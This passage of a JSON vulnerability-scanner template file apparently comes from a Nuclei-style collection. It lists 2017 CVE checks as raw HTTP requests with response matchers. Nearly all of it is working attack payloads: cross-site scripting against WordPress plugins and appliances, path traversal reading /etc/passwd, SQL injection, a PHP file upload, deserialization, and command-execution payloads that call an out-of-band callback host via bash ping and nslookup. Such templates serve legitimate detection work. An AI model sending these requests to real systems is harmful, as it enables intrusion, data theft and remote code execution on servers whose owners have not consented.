Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/pagination/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Pagination by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18562","info":{"name":"Error Log Viewer by BestWebSoft < 1.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Error Log Viewer by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-1000486","info":{"name":"Primetek Primefaces 5.x - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"],"matchers":[{"type":"word","part":"header","words":["Mogwailabs: CHECKCHECK"]}]}]},{"id":"CVE-2017-7269","info":{"name":"Windows Server 2003 & IIS 6.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"OPTIONS","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"<DAV:sql>\", dasl)","regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)","regex(\".*?PROPFIND\", public)","regex(\".*?PROPFIND\", allow)"],"condition":"or"},{"type":"word","part":"header","words":["IIS/6.0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18492","info":{"name":"Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form to DB by\")"],"condition":"and"}]}]},{"id":"CVE-2017-7855","info":{"name":"IceWarp WebMail 11.3.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["lang=\"\"><img src=x onerror=alert(document.domain)>","IceWarp"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18558","info":{"name":"Testimonials by BestWebSoft < 0.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Testimonials by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18536","info":{"name":"WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["forbidden - number in author","</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11629","info":{"name":"FineCMS <=5.0.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>p\u4e0d\u5b58\u5728"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10075","info":{"name":"Oracle Content Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO","{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","ORACLE_QUERY"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000028","info":{"name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd","{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-7615","info":{"name":"MantisBT <=2.30 - Arbitrary Password Reset/Admin Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=","{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18528","info":{"name":"PDF & Print by BestWebSoft < 1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"PDF & Print by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-7391","info":{"name":"Magmi 0.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17562","info":{"name":"Embedthis GoAhead <3.6.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"endpoint":["admin","apply","non-CA-rev","cgitest","checkCookie","check_user","chn/liveView","cht/liveView","cnswebserver","config","configure/set_link_neg","configure/swports_adjust","eng/liveView","firmware","getCheckCode","get_status","getmac","getparam","guest/Login","home","htmlmgr","index","index/login","jscript","kvm","liveView","login","login.asp","login/login","login/login-page","login_mgr","luci","main","main-cgi","manage/login","menu","mlogin","netbinary","nobody/Captcha","nobody/VerifyCode","normal_userLogin","otgw","page","rulectl","service","set_new_config","sl_webviewer","ssi","status","sysconf","systemutil","t/out","top","unauth","upload","variable","wanstatu","webcm","webmain","webproc","webscr","webviewLogin","webviewLogin_m64","webviewer","welcome"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["environment variable","display library search paths"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9506","info":{"name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-9140","info":{"name":"Reflected XSS - Telerik Reporting Module","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)"],"matchers-condition":"and","matchers":[{"type":"word","words":["#000000\"onload=\"prompt(1)","Telerik.ReportViewer.axd?name=Resources"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-6090","info":{"name":"PhpColl 2.5.1 Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n-----------------------------154934846911423734231554128137\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------154934846911423734231554128137--\n","GET /logos_clients/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10271","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope\n    xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soapenv:Header>\n        <work:WorkContext\n            xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n            <java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n                <void class=\"java.lang.ProcessBuilder\">\n                    <array class=\"java.lang.String\" length=\"3\">\n                        <void index=\"0\">\n                            <string>/bin/bash</string>\n                        </void>\n                        <void index=\"1\">\n                            <string>-c</string>\n                        </void>\n                        <void index=\"2\">\n                            <string>ping -c 1 {{interactsh-url}}</string>\n                        </void>\n                    </array>\n                    <void method=\"start\"/></void>\n            </java>\n        </work:WorkContext>\n    </soapenv:Header>\n    <soapenv:Body/>\n</soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n  <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n          <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n              <java>\n                  <void class=\"java.lang.Thread\" method=\"currentThread\">\n                      <void method=\"getCurrentWork\">\n                          <void method=\"getResponse\">\n                              <void method=\"getServletOutputStream\">\n                                  <void method=\"flush\"/>\n                              </void>\n                              <void method=\"getWriter\"><void method=\"write\"><string>{{randstr}}</string></void></void>\n                          </void>\n                      </void>\n                  </void>\n              </java>\n          </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n</soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex(\"<faultstring>java.lang.ProcessBuilder || <faultstring>0\", body)","contains(interactsh_protocol, \"dns\")","status_code == 500"],"condition":"and"},{"type":"dsl","dsl":["body == \"{{randstr}}\"","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-18500","info":{"name":"Social Buttons Pack by BestWebSof < 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Social Buttons Pack by\")"],"condition":"and"}]}]},{"id":"CVE-2017-1000170","info":{"name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"],"body":"dir=%2Fetc%2F&onlyFiles=true","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<li class='file ext_passwd'>","<a rel='/passwd'>passwd</a></li>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18598","info":{"name":"WordPress Qards - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/qards/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["console.log"]}]}]},{"id":"CVE-2017-11512","info":{"name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini","{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2017-18566","info":{"name":"User Role by BestWebSoft < 1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/user-role/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"User Role by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18557","info":{"name":"Google Maps by BestWebSoft < 1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google Maps by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-12637","info":{"name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WEB-INF","META-INF"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18542","info":{"name":"Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Zendesk Help Center by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-15363","info":{"name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<?php","'host'","'database'","'extConf'","'debug'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9822","info":{"name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /__ HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nCookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key=\"name1: key1\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type=\"xsd:string\">C:\\Windows\\win.ini</anyType></MethodParameters><ObjectInstance xsi:type=\"FileSystemUtils\"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]","for 16-bit app support"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2017-4011","info":{"name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-14651","info":{"name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Failed to add new collection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-1000029","info":{"name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/file%3a///etc/passwd/"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7925","info":{"name":"Dahua Security - Configuration File Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/passwd"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body), \"ugm\")","contains(to_lower(body), \"id:name:passwd\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["1:(.*:.*):1:CtrPanel"]}]}]},{"id":"CVE-2017-14186","info":{"name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5689","info":{"name":"Intel Active Management - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /hw-sys.htm HTTP/1.1\nHost: {{Hostname}}\n"],"digest-username":"admin","matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["System Status","Active Management Technology"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5521","info":{"name":"NETGEAR Routers - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["right\">Router\\s*Admin\\s*Username<","right\">Router\\s*Admin\\s*Password<"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18502","info":{"name":"Subscriber by BestWebSoft < 1.3.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Subscriber by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18491","info":{"name":"Contact Form by BestWebSoft < 4.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form by\")"],"condition":"and"}]}]},{"id":"CVE-2017-14135","info":{"name":"OpenDreambox 2.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/bin/sh","/usr/script"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7921","info":{"name":"Hikvision - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<firmwareVersion>"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2017-11444","info":{"name":"Subrion CMS <4.1.5.10 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{string}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18487","info":{"name":"AdPush < 1.44 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google AdSense\")"],"condition":"and"}]}]},{"id":"CVE-2017-18517","info":{"name":"Pinterest by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 